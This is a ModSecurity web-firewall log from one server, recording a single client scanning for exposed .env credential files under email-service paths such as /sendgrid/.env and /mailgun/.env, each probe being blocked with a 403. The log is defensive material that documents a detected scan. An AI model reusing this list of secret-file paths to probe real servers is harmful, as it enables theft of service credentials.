[Mon May 11 16:54:39.702987 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/email/.env"] [unique_id "agHtr0WKUxpmnkK7zHyHVAAAAQI"]
[Mon May 11 16:54:39.902241 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /smtp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/smtp/.env"] [unique_id "agHtr0WKUxpmnkK7zHyHVQAAAQI"]
[Mon May 11 16:54:39.902459 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/smtp/.env"] [unique_id "agHtr0WKUxpmnkK7zHyHVQAAAQI"]
[Mon May 11 16:54:39.902673 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/smtp/.env"] [unique_id "agHtr0WKUxpmnkK7zHyHVQAAAQI"]
[Mon May 11 16:54:40.239436 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailing/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/mailing/.env"] [unique_id "agHtsEWKUxpmnkK7zHyHVgAAAQI"]
[Mon May 11 16:54:40.239665 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/mailing/.env"] [unique_id "agHtsEWKUxpmnkK7zHyHVgAAAQI"]
[Mon May 11 16:54:40.239885 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/mailing/.env"] [unique_id "agHtsEWKUxpmnkK7zHyHVgAAAQI"]
[Mon May 11 16:54:40.548754 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notifications/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/notifications/.env"] [unique_id "agHtsEWKUxpmnkK7zHyHVwAAAQI"]
[Mon May 11 16:54:40.548992 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/notifications/.env"] [unique_id "agHtsEWKUxpmnkK7zHyHVwAAAQI"]
[Mon May 11 16:54:40.549232 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/notifications/.env"] [unique_id "agHtsEWKUxpmnkK7zHyHVwAAAQI"]
[Mon May 11 16:54:40.668294 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/notify/.env"] [unique_id "agHtsEWKUxpmnkK7zHyHWAAAAQI"]
[Mon May 11 16:54:40.668499 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/notify/.env"] [unique_id "agHtsEWKUxpmnkK7zHyHWAAAAQI"]
[Mon May 11 16:54:40.668711 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/notify/.env"] [unique_id "agHtsEWKUxpmnkK7zHyHWAAAAQI"]
[Mon May 11 16:54:40.838207 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sender/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/sender/.env"] [unique_id "agHtsEWKUxpmnkK7zHyHWQAAAQI"]
[Mon May 11 16:54:40.838412 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/sender/.env"] [unique_id "agHtsEWKUxpmnkK7zHyHWQAAAQI"]
[Mon May 11 16:54:40.838618 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/sender/.env"] [unique_id "agHtsEWKUxpmnkK7zHyHWQAAAQI"]
[Mon May 11 16:54:41.093673 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /campaign/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/campaign/.env"] [unique_id "agHtsUWKUxpmnkK7zHyHWwAAAQI"]
[Mon May 11 16:54:41.093906 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/campaign/.env"] [unique_id "agHtsUWKUxpmnkK7zHyHWwAAAQI"]
[Mon May 11 16:54:41.094145 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/campaign/.env"] [unique_id "agHtsUWKUxpmnkK7zHyHWwAAAQI"]
[Mon May 11 16:54:44.131098 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /newsletter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/newsletter/.env"] [unique_id "agHttEWKUxpmnkK7zHyHXgAAAQI"]
[Mon May 11 16:54:44.131309 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/newsletter/.env"] [unique_id "agHttEWKUxpmnkK7zHyHXgAAAQI"]
[Mon May 11 16:54:44.131562 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/newsletter/.env"] [unique_id "agHttEWKUxpmnkK7zHyHXgAAAQI"]
[Mon May 11 16:54:44.398977 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ses/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/ses/.env"] [unique_id "agHttEWKUxpmnkK7zHyHXwAAAQI"]
[Mon May 11 16:54:44.399244 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/ses/.env"] [unique_id "agHttEWKUxpmnkK7zHyHXwAAAQI"]
[Mon May 11 16:54:44.399485 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/ses/.env"] [unique_id "agHttEWKUxpmnkK7zHyHXwAAAQI"]
[Mon May 11 16:54:44.675824 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sendgrid/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/sendgrid/.env"] [unique_id "agHttEWKUxpmnkK7zHyHYAAAAQI"]
[Mon May 11 16:54:44.676051 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/sendgrid/.env"] [unique_id "agHttEWKUxpmnkK7zHyHYAAAAQI"]
[Mon May 11 16:54:44.676311 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/sendgrid/.env"] [unique_id "agHttEWKUxpmnkK7zHyHYAAAAQI"]
[Mon May 11 16:54:44.871472 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sparkpost/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/sparkpost/.env"] [unique_id "agHttEWKUxpmnkK7zHyHYQAAAQI"]
[Mon May 11 16:54:44.871684 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/sparkpost/.env"] [unique_id "agHttEWKUxpmnkK7zHyHYQAAAQI"]
[Mon May 11 16:54:44.871922 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/sparkpost/.env"] [unique_id "agHttEWKUxpmnkK7zHyHYQAAAQI"]
[Mon May 11 16:54:45.005659 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postmark/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/postmark/.env"] [unique_id "agHttUWKUxpmnkK7zHyHYgAAAQI"]
[Mon May 11 16:54:45.005886 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/postmark/.env"] [unique_id "agHttUWKUxpmnkK7zHyHYgAAAQI"]
[Mon May 11 16:54:45.006128 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/postmark/.env"] [unique_id "agHttUWKUxpmnkK7zHyHYgAAAQI"]
[Mon May 11 16:54:45.186014 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailgun/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/mailgun/.env"] [unique_id "agHttUWKUxpmnkK7zHyHYwAAAQI"]
[Mon May 11 16:54:45.186260 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/mailgun/.env"] [unique_id "agHttUWKUxpmnkK7zHyHYwAAAQI"]
[Mon May 11 16:54:45.186501 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/mailgun/.env"] [unique_id "agHttUWKUxpmnkK7zHyHYwAAAQI"]
[Mon May 11 16:54:45.461553 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mandrill/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/mandrill/.env"] [unique_id "agHttUWKUxpmnkK7zHyHZAAAAQI"]
[Mon May 11 16:54:45.461772 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/mandrill/.env"] [unique_id "agHttUWKUxpmnkK7zHyHZAAAAQI"]
[Mon May 11 16:54:45.462013 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/mandrill/.env"] [unique_id "agHttUWKUxpmnkK7zHyHZAAAAQI"]
